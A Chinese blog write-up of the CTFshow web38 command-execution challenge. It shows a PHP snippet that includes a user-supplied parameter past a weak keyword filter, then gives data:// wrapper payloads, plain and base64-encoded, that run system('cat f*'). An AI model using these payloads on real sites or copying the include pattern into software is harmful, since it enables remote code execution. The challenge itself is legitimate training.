源码

<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 05:23:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*///flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag|php|file/i", $c)){include($c);echo $flag;}}else{highlight_file(__FILE__);
}

发现过滤了php和file,php和file伪协议都不能用了,继续用data伪协议
?c=data://text/plain,<?php system("cat f*")?>
发现什么都没有显示, 原因是php被过滤,使用base64编码就好了
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZioiKTs/PiA=

CTFshow 命令执行 web38相关推荐

  1. CTFshow——命令执行

    CTFshow--命令执行 Web29 <?php error_reporting(0); if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_matc ...

  2. [CTFSHOW]命令执行

    文章目录 web 29 web 30 web 31 web32 web33-36 web37 web38 web40 web41 web42 web43 web44 web45 web46 web47 ...

  3. CTFshow命令执行29-123

    命令执行 WEB29 eval是php中执行以PHP脚本执行的命令 PHP命令可以执行脚本命令 本题使用方法是先 system(cp f*.php 1.txt) 然后访问1.txt WEB30 在PH ...

  4. CTFshow 命令执行 web72

    目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 ...

  5. ctfshow命令执行(持续更新,已更至web39)

    做命令执行题比前两种慢很多,到现在也只做了总数的五分之一,慢慢来吧. web29 web30 web31 web32 web33~36 web37 web38 web39 web29 题目如下: er ...

  6. ctfshow 命令执行 web29-web77 web118-122 web124 wp

    南神博客 文章目录 命令执行 web29 web30 web31 web32 web33 web34 web35 web36 web37 web38 web39 web40 web41 web42 w ...

  7. ctfshow命令执行篇

    web31 echo(`ls%09/`); echo(`tac%09fla*`); web32 过滤; 关键命令执行函数也不能用 用文件包含 其实这个做法也是靠刷题经验猜flag路径 c=includ ...

  8. [CTFSHOW]命令执行55-74

    web 55 if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\< ...

  9. ctfshow命令执行

    目录 web33:[文件包含] web34: web35: web36:多过滤了0-9的数字,用参数逃逸可以不用数字,用字母就可以成功绕过 ,步骤一样,略 web37: web38: web39: w ...

最新文章

  1. 8.11 更改用户ID和组ID
  2. 企业级java springboot b2bc商城系统开源源码二次开发-(四)断路器(Hystrix)
  3. 【CodeForces - 298C】Parity Game (思维,有坑)
  4. 误报的java.sql.SQLException: Parameter number 21 is not an OUT parameter
  5. python_海龟绘图_坐标系问题_画笔各种方法---python工作笔记013
  6. js 获取页面高度和宽度(兼容 ie firefox chrome),获取鼠标点击位置
  7. Recover through incarnations: RMAN-20208
  8. JAVA轻量级ORM框架JOOQ体验
  9. Spring Cloud 常用注解
  10. 如何卸载新版Edge并禁用自动更新
  11. MSTAR 数据转格式
  12. 批量添加时id使用mybatisplus的id生成策略
  13. 【ACWing】671. DDD
  14. Android蓝牙音乐获取歌曲信息
  15. 软件测试面试题之非技术面试(GZH:软件测试大本营)
  16. 声音与噪声(分贝、声功率、声强和声压)
  17. (C语言)对称数判断
  18. 银行资产负债表-分科目详细解释
  19. 正则表达式 - Python 正则表达式 学习笔记 最全整理
  20. 2021年起重机司机(限桥式起重机)考试题库及起重机司机(限桥式起重机)理论考试

热门文章

  1. 下一代Asp.net开发规范OWIN(2)—— Katana介绍以及使用
  2. Windows Mobile Incoming Call View Custom
  3. Sqlserver:谈索引优化需要注意的几个方面
  4. USB学习5---android usb驱动源代码目录说明
  5. 8953n的user获取权限以及remount
  6. Android Usb的研究
  7. Android设备音频部分一些概念
  8. 基于FT5x06嵌入式Linux电容触摸屏驱动
  9. WINCE补丁包下载地址
  10. VC socket api使用引入